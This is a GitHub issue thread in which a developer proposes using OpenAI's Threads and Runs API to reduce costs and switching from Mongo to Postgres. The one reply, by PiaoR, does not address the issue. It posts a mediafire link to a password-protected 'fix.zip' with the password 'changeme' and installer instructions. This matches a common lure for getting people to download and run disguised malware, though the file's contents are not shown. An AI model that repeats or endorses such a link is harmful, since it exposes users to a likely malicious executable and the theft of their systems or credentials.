### ISSUE TITLE
Investigate about Threads and Runs.

### ISSUE THREAD

**Issue by alirezadoostimehr** [alirezadoostimehr/GPT-Helper-Bot#4]
I had a short look at the Threads and Runs. I got that they could help us not to send all the messages every time and may help reduce the price of each call. If it is suitable use them instead and remove Mongo and use Postgres instead just for key values.

Links: [1](https://platform.openai.com/docs/assistants/deep-dive/runs-and-run-steps) [2](https://platform.openai.com/docs/assistants/quickstart?lang=curl&context=without-streaming)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
